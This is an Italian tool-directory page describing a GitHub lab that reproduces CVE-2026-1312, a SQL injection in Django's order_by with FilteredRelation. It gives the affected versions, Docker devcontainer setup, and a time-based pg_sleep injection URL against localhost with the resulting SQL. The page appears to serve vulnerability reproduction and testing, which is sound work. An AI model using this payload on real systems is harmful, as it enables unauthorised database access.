Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1312 — Riproduce CVE-2026-1312, una vulnerabilità di SQL injection in Django, con un ambiente Dockerizzato e PoC passo-passo per i test di sicurezza. | Kitploit
Strumenti/GitHubGitHub/sw0rd1ight/cve-2026-1312
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubsw0rd1ight/cve-2026-1312

CVE-2026-1312

Riproduce CVE-2026-1312, una vulnerabilità di SQL injection in Django, con un ambiente Dockerizzato e PoC passo-passo per i test di sicurezza.

Vedi Repository
26 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-1312 è una vulnerabilità SQL injection ad alto rischio in Django: quando si utilizza un alias di colonna contenente un punto in QuerySet.order_by(), combinato con FilteredRelation per costruire dinamicamente una query tramite l'espansione di un dizionario, un attaccante può iniettare SQL dannoso

Versioni interessate:

  • Versioni precedenti alla 6.0.2 nel ramo Django 6.0
  • Versioni precedenti alla 5.2.11 nel ramo Django 5.2
  • Versioni precedenti alla 4.2.28 nel ramo Django 4.2

Avvio dell'ambiente

Questo progetto di vulnerabilità utilizza il devcontainer di vscode per la costruzione

1️⃣ Aprire il progetto Aprire con VS Code la directory principale del progetto esistente (che contiene la cartella .devcontainer).

2️⃣ Riaprire il contenitore (costruire il Dev Container)

Premere Ctrl+Shift+P (Windows/Linux) o Cmd+Shift+P (Mac)

Digitare Remote-Containers: Reopen in Container

VS Code leggerà la configurazione .devcontainer e costruirà il contenitore (la prima costruzione potrebbe richiedere alcuni minuti)

⚠️ Se il Dockerfile o le dipendenze sono state aggiornate, è possibile selezionare Remote-Containers: Rebuild Container per garantire l'uso dell'ambiente più recente.

3️⃣ Eseguire il server di sviluppo Django

Aprire il pannello comandi con Ctrl+Shift+P

Digitare Tasks: Run Task

Selezionare django:start (l'attività è già configurata in .vscode/tasks.json)

Questa attività avvierà il server di sviluppo Django all'interno del contenitore

In ascolto predefinito su 0.0.0.0:8086

4️⃣ Aprire il browser e accedere al progetto

Aprire il browser e visitare:

http://localhost:8086

5️⃣ Note

Prima esecuzione:

Potrebbe essere necessario eseguire le migrazioni del database:

root@kitploit:~
python manage.py migrate

Riproduzione della vulnerabilità

Accedere all'interfaccia /book/search, http://localhost:8086/book/search?name=vuln_book.id,pg_sleep(2)

Si può osservare un ritardo di 3 secondi, che conferma il successo

A questo punto la SQL compilata a livello di ORM di Django è

root@kitploit:~
SELECT "vuln_book"."id", "vuln_book"."title", "vuln_book"."author_id" FROM "vuln_book" ORDER BY ("vuln_book".id,pg_sleep(2)) ASC
Scarica lo strumento